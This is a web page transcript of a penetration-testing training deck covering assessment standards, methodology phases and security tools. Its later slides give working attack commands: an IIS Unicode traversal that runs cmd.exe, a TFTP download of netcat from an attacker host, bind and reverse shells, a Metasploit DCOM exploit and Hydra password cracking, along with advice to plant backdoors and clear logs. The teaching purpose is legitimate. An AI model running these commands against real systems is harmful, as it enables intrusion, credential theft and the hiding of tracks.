(VAPT) Vulnerability Assessment And Penetration Testing
 
Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51Why Penetration Testing Services Cyber51
Why Penetration Testing Services Cyber51
 
Phi 235 social media security users guide presentation
Phi 235 social media security users guide presentationPhi 235 social media security users guide presentation
Phi 235 social media security users guide presentation
 
Web application vulnerability assessment
Web application vulnerability assessmentWeb application vulnerability assessment
Web application vulnerability assessment
 
Types of Vulnerability Scanning An in depth investigation.pdf
Types of Vulnerability Scanning An in depth investigation.pdfTypes of Vulnerability Scanning An in depth investigation.pdf
Types of Vulnerability Scanning An in depth investigation.pdf
 
Indexing Building Evaluation Criteria
Indexing Building Evaluation CriteriaIndexing Building Evaluation Criteria
Indexing Building Evaluation Criteria
 
IRJET- Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing SuiteIRJET- Cross Platform Penetration Testing Suite
IRJET- Cross Platform Penetration Testing Suite
 
Introduction to security testing raj
Introduction to security testing rajIntroduction to security testing raj
Introduction to security testing raj
 
Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12Nt2580 Unit 7 Chapter 12
Nt2580 Unit 7 Chapter 12
 
Cst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.comCst 630 Extraordinary Success/newtonhelp.com
Cst 630 Extraordinary Success/newtonhelp.com
 
Cst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.comCst 630 Motivated Minds/newtonhelp.com
Cst 630 Motivated Minds/newtonhelp.com
 

Dernier

Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Osopher
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQuiz Club NITW
 
Mythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWMythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWQuiz Club NITW
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Celine George
 
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQ-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQuiz Club NITW
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxkarenfajardo43
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroomSamsung Business USA
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationdeepaannamalai16
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptxmary850239
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxAnupam32727
 
An Overview of the Calendar App in Odoo 17 ERP
An Overview of the Calendar App in Odoo 17 ERPAn Overview of the Calendar App in Odoo 17 ERP
An Overview of the Calendar App in Odoo 17 ERPCeline George
 
Scientific Writing :Research Discourse
Scientific Writing :Research DiscourseScientific Writing :Research Discourse
Scientific Writing :Research DiscourseAnita GoswamiGiri
 
ICS 2208 Lecture Slide Notes for Topic 6
ICS 2208 Lecture Slide Notes for Topic 6ICS 2208 Lecture Slide Notes for Topic 6
ICS 2208 Lecture Slide Notes for Topic 6Vanessa Camilleri
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfChristalin Nelson
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...Nguyen Thanh Tu Collection
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...Nguyen Thanh Tu Collection
 

Dernier (20)

Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
Healthy Minds, Flourishing Lives: A Philosophical Approach to Mental Health a...
 
Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,Spearman's correlation,Formula,Advantages,
Spearman's correlation,Formula,Advantages,
 
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITWQ-Factor General Quiz-7th April 2024, Quiz Club NITW
Q-Factor General Quiz-7th April 2024, Quiz Club NITW
 
Mythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITWMythology Quiz-4th April 2024, Quiz Club NITW
Mythology Quiz-4th April 2024, Quiz Club NITW
 
Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"Mattingly "AI & Prompt Design: Large Language Models"
Mattingly "AI & Prompt Design: Large Language Models"
 
Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17Tree View Decoration Attribute in the Odoo 17
Tree View Decoration Attribute in the Odoo 17
 
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITWQ-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
Q-Factor HISPOL Quiz-6th April 2024, Quiz Club NITW
 
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptxGrade Three -ELLNA-REVIEWER-ENGLISH.pptx
Grade Three -ELLNA-REVIEWER-ENGLISH.pptx
 
6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom6 ways Samsung’s Interactive Display powered by Android changes the classroom
6 ways Samsung’s Interactive Display powered by Android changes the classroom
 
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
Plagiarism,forms,understand about plagiarism,avoid plagiarism,key significanc...
 
Congestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentationCongestive Cardiac Failure..presentation
Congestive Cardiac Failure..presentation
 
4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx4.9.24 School Desegregation in Boston.pptx
4.9.24 School Desegregation in Boston.pptx
 
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptxCLASSIFICATION OF ANTI - CANCER DRUGS.pptx
CLASSIFICATION OF ANTI - CANCER DRUGS.pptx
 
An Overview of the Calendar App in Odoo 17 ERP
An Overview of the Calendar App in Odoo 17 ERPAn Overview of the Calendar App in Odoo 17 ERP
An Overview of the Calendar App in Odoo 17 ERP
 
Scientific Writing :Research Discourse
Scientific Writing :Research DiscourseScientific Writing :Research Discourse
Scientific Writing :Research Discourse
 
ICS 2208 Lecture Slide Notes for Topic 6
ICS 2208 Lecture Slide Notes for Topic 6ICS 2208 Lecture Slide Notes for Topic 6
ICS 2208 Lecture Slide Notes for Topic 6
 
Indexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdfIndexing Structures in Database Management system.pdf
Indexing Structures in Database Management system.pdf
 
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of EngineeringFaculty Profile prashantha K EEE dept Sri Sairam college of Engineering
Faculty Profile prashantha K EEE dept Sri Sairam college of Engineering
 
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
31 ĐỀ THI THỬ VÀO LỚP 10 - TIẾNG ANH - FORM MỚI 2025 - 40 CÂU HỎI - BÙI VĂN V...
 
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...
BÀI TẬP BỔ TRỢ TIẾNG ANH 8 - I-LEARN SMART WORLD - CẢ NĂM - CÓ FILE NGHE (BẢN...
 

NSA and PT

  • 1. Program: Certified Computer Security Analyst (CCSA) LSP Telematika Created By Semi Yulianto Shared By Linuxer@kaskus.co.id
  • 2. Semi Yulianto MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA, CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc  Independent Trainer and Consultant  EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia) Current Roles: ITS2 (Riyadh, Saudi Arabia) Senior Technical Trainer/Security Consultant IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)  Security Consultant (Web Application Pen-Tester)  Security Consultant (ESET Anti-Virus & Smart Security) semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com Contacts: +62 852 1325 6600 and +60 14 9377 462
  • 3. 1. Vulnerabilities by Management Categories 2. Assessment Standards 3. Assessment Service Definition 4. Network Assessment Methodology 5. Pen-Test Methodology 6. Security Tools 7. Investigating Vulnerabilities
  • 4. OS configuration - Vulnerabilities due to improperly configured operating system software.  Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.  Password/access control - Failure to comply with password policy and improper access control settings.  Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.  Dangerous services - Existence of vulnerable or easily exploited services or processes.  Application configuration - Vulnerabilities due to improperly configured applications. 
  • 5.
  • 6.
  • 7. The United States National Security Agency (NSA) has provided an NSA (US) INFOSEC Assessment Methodology (IAM) framework to help consultants  and security professionals outside the NSA provide assessment services to clients in line with a recognized standard. http://www.iatrp.com The Government Communications Headquarters (GCHQ) in the United CESG CHECK (UK) Kingdom has an information assurance arm known as the Communications   and Electronics security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security Security Group (CESG). In the same way that the NSA IAM framework allows testing teams within the U.K. to undertake government assessment work. http://www.cesg.gov.uk/site/check/index.cfm
  • 8.  Assessment - Level 1 involves discovering a cooperative high- The IAM framework defines three levels of assessment: level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands- on network or system testing is undertaken at this level. Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.  Red Team - Level 3 is non cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is on intrusive, so within  this framework, a Level 3 assessment involves full qualification of vulnerabilities.
  • 9. 1. Use of DNS information retrieval tools for both single and The CESG CHECK network security assessment as: multiple records, including an understanding of DNS record structure relating to target hosts. 2. Use of ICMP, TCP, and UDP network mapping and probing tools 3. Demonstration of TCP service banner grabbing. 4. Information retrieval using SNMP, including an understanding of MIB structure relating to target system configuration and network routes. 5. Understanding of common weaknesses in routers and switches relating to Telnet, HTTP, SNMP, and TFTP access and configuration.
  • 10. 1. User enumeration via finger, rusers, rwho, and SMTP CESG CHECK Unix-specific competencies: techniques 2. Use of tools to enumerate Remote Procedure Call (RPC) services and demonstrate an understanding of the security implications associated with those services. 3. Demonstration of testing for Network File System (NFS) weaknesses. 4. Testing for weaknesses within r-services (rsh, rexec, and rlogin). 5. Detection of insecure X Windows servers. 6. Testing for weaknesses within web, FTP, and Samba services.
  • 11. 1. Assessment of NetBIOS and CIFS services to enumerate CESG CHECK Windows NT-specific competencies: users, groups, shares, domains, domain controllers, password policies, and associated weaknesses. 2. Username and password grinding via NetBIOS and CIFS services. 3. Detecting and demonstrating presence of known security weaknesses within. 4. Internet Information Server (IIS) web and FTP service components, and Microsoft SQL Server.
  • 12.  ISECOM’s Open Source Security Testing Methodology Other Assessment Standards & Associations: Manual (OSSTMM) http://www.osstmm.org  Council of Registered Ethical Security Testers (CREST) http://www.crestapproved.com  TIGER Scheme http://www.tigerscheme.org  EC-Council’s Certified Ethical Hacker (CEH) http://www.eccouncil.org/CEH.htm  Open Source Web Application Security Project (OWASP) http://www.owasp.org
  • 13. 1. Vulnerability Scanning 2. Network Security Assessment 3. Web Application Testing 4. Penetration Testing 5. Onsite Audit
  • 14. Uses automated systems (such as Nessus, ISS Internet Vulnerability Scanning Scanner, QualysGuard, or eEye Retina) with minimal  hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security. An effective blend of automated and hands-on manual Network Security Assessment vulnerability testing and qualification. The report is  usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.
  • 15. Involves post-authentication assessment of web application Web Application Testing components, identifying command injection, poor  permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated. Involves multiple attack vectors (e.g., telephone war dialing, Penetration Testing social engineering, and wireless testing) to compromise the  target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.
  • 16. Provides the clearest picture of network security.  Onsite Audition Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
  • 17.
  • 18.
  • 19. 1. Network reconnaissance to identify IP networks High-level components of Network Assessment: and hosts of interest. 2. Bulk network scanning and probing to identify potentially vulnerable hosts. 3. Investigation of vulnerabilities and further network probing by hand. 4. Exploitation of vulnerabilities and circumvention of security mechanisms.
  • 20. 1. Information Gathering 2. Service Enumeration 3. Vulnerability Identification 4. Penetration 5. Maintaining Access 6. Housekeeping
  • 21. The objective of information gathering is to find as  Information Gathering many information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering. Involves launching network and port scanning to  Service Enumeration find open, filtered ports and services running on a specific port.
  • 22. Involves finding new and currently available  Vulnerability Identification vulnerability on the operating systems, applications and/or services (manual or automated). Involves active penetration on a specific target of  Penetration evaluation by exploiting any new or known vulnerability.
  • 23. Involves uploading trojan or backdoor with the Maintaining Access objective to make it easier to go in and out from a  target of evaluation without having to do the exploitation and ensure that the activities are not being noticed. Clearning up to cover tracks. Involves disabling Housekeeping audit settings and clearing or altering log files  (system, security and application).
  • 24.
  • 25. 1. Nmap (http://www.insecure.org) Scanning Tools: 2. Nessus (http://www.nessus.org) 3. ISS Internet Scanner (http://www.iss.net) 4. eEye Retina (http://www.eeye.com) 5. QualysGuard (http://www.qualys.com) 6. Matta Colossus (http://www.trustmatta.com)
  • 26. 1. Metasploit Framework Exploitation Frameworks: (http://www.metasploit.com) 2. Core IMPACT (http://www.coresecurity.com) 3. Immunity CANVAS (http://www.immunityinc.com/products- canvas.shtml)
  • 27. 1. Paros (http://www.parosproxy.org) Proxy-based web application testing tools: 2. WebScarab http://www.owasp.org/index.php/Category:OWAS P_WebScarab_Project) 3. Burp suite (http://portswigger.net)
  • 28. 1. Wapiti (http://wapiti.sourceforge.net) Active web application crawling and fuzzing tools: 2. Nikto (http://www.cirt.net/code/nikto.shtml)
  • 29. 1. Acunetix Web Vulnerability Scanner Web Application Scanning Tools: (http://www.acunetix.com) 2. Watchfire AppScan (http://www.watchfire.com/products/appscan/) 3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspe ct/) 4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic _hailstorm.php)
  • 30. 1. Securiteam (http://www.securiteam.com) Useful Websites: 2. SecurityFocus (http://www.securityfocus.com) 3. milw0rm (http://www.milw0rm.com) 4. Offensive Security Exploit DB (http://www.exploit-db.com) 5. Packet Storm (http://www.packetstormsecurity.org) 6. FrSIRT (http://www.frsirt.com) 7. MITRE Corporation CVE (http://cve.mitre.org) 8. NIST National Vulnerability Database (http://nvd.nist.gov) 9. ISS X-Force (http://xforce.iss.net) 10. CERT vulnerability notes (http://www.kb.cert.org/vuls) 11. eEye Preview (http://research.eeye.com/html/services) 12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com) 13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
  • 31. 1. Information Gathering 2. Service Identification 3. Vulnerability Identification 4. Penetration (Exploitation) 5. Maintaining Access 6. Housekeeping (Covering Tracks) 7. Password Cracking 8. Client-Side Hacking 9. Web Application Hacking 10. Denial-of-Service (DoS) Attacks 11. Sniffing and ARP Spoofing 12. Wireless Hacking 13. Linux Hacking 14. Analyzing Attack Signatures with IDS and Sniffer 15. Evading IDS and Firewall
  • 32. IIS Unicode Directory Traversal Exploit  Syntax: nc –v <target_ip> <http_port> GET http://<target_ip>/scripts/<unicode_string s>/<windows_dir>/cmd.exe?/c+<command>  Example: nc –v 131.107.1.101 80 GET http://131.107.1.101/scripts/..%255c../win nt/system32/cmd.exe?/c+dir
  • 33. TFTP (Trivial File Transfer Protocol) Upload and Download  Syntax: tftp –i <localhost_ip> GET <file> tftp –i <localhost_ip> PUT <file>  Example: tftp –i 131.107.1.252 GET nc.exe tftp –i 131.107.1.101 PUT nc.exe  Unicode Examples: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
  • 34. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <port_to_listen_to> nc –vlp <port_to_listen_to>  Example: nc –v –l –p 555 nc –vlp 555
  • 35. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Example: nc –v 131.107.1.101 555
  • 36. Netcat (Network Swiss Army Knife) Server Mode (listening/reverse TCP)  Syntax: nc –v –l –p <listening_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+-l+-p+5555
  • 37. Netcat (Network Swiss Army Knife) Client Mode (connecting/bind TCP)  Syntax: nc –v <target_ip> <target_port>  Unicode Syntax: GET http://<target_ip>/scripts/<unicode_strings>/<wind ows_dir>/cmd.exe?/c+<command>  Example: GET http://131.107.1.101/scripts/..%255c../winnt/syste m32/cmd.exe?/c+nc+-v+131.107.1.252+555
  • 38. Nmap (Ping Sweep/Network Scan)  Syntax: nmap –sP <network_id>  Example: nmap –sP 131.107.1.0/24 Nmap (Port Scan)  Syntax: nmap <target_ip>  Example: nmap 131.107.1.101
  • 39. Nmap (Port Scan with Options)  Syntax: nmap <option> <target_ip>  Examples: nmap –sS –sV –O 131.107.1.101 nmap –sS –sV –p80,443 –O 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 131.107.1.101 nmap –sS –sV –p80,443 –O –T4 –PN 131.107.1.101 nmap –sU –sV –O 131.107.1.101 nmap –A 131.107.1.101
  • 40. Nmap (Enumeration)  Syntax: nmap <option> <script> <target_ip>  Examples: nmap –sS –script=smb-enum-users 131.107.1.101 nmap –sS –script=smb-enum-shares 131.107.1.101 nmap –sS –script=smb-enum-domains 131.107.1.101 nmap –sS –script=smb-enum-processes 131.107.1.101 nmap –sS –script=smb-enum-security 131.107.1.101
  • 41. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show exploits msf > use <exploit_module> msf > show payloads msf > set PAYLOAD <payload_type> msf > show options msf > set RHOST <target_ip> msf > set LHOST <localhost_ip> msf > set LPORT <local_port> msf > set RPORT <remote_port> msf > show targets msf > set TARGET <target_id> msf > exploit
  • 42. Metasploit Framework Exploit Module (MSFConsole) cd /pentest/exploits/msf3 ./msfconsole  Example: msf > help msf > show exploits msf > use windows/dcerpc/ms03_026_dcom msf > show payloads msf > set PAYLOAD windows/shell/reverse_tcp msf > show options msf > set RHOST 131.107.1.101 msf > set LHOST 131.107.1.252 msf > set LPORT 5555 msf > set RPORT 1234 msf > show targets msf > set TARGET 0 msf > exploit
  • 43. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Syntax: msf > help msf > show auxiliary msf > use <auxiliary_module> msf > set RHOSTS <target_ip_or_network_id> msf > run
  • 44. Metasploit Framework Auxiliary Module cd /pentest/exploits/msf3 ./msfconsole  Example 1: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.101 msf > run  Example 2: msf > help msf > show auxiliary msf > use scanner/smb/smb_version msf > set RHOSTS 131.107.1.0/24 msf > run
  • 45. Metasploit Framework Exploit Module (MSFCLI) cd /pentest/exploits/msf3  Syntax: ./msfcli <exploit_module> <payload_type> <options> E  Example: ./msfcli windows/dcerpc/ms03_026_dcom PAYLOAD=windows/shell/bind_tcp RHOST=131.107.1.101 E
  • 46. THC Hydra (Dictionary-based Password Cracking) cd /tmp  Syntax: ./hydra –L <users_file> -P <passwords_file> <target_ip> <service_type>  Examples: ./hydra –L login.txt –P pass.txt 131.107.1.101 ftp ./hydra –L login.txt –P pass.txt 131.107.1.101 smb ./hydra –L login.txt –P pass.txt 131.107.1.101 mssql ./hydra –L login.txt –P pass.txt 131.107.1.101 rpc
  • 47. Nikto (Web Application Vulnerability Scanner) cd /pentest/nikto  Syntax: ./nikto.pl –host <target_ip>  Example: ./nikto.pl –host 131.107.1.101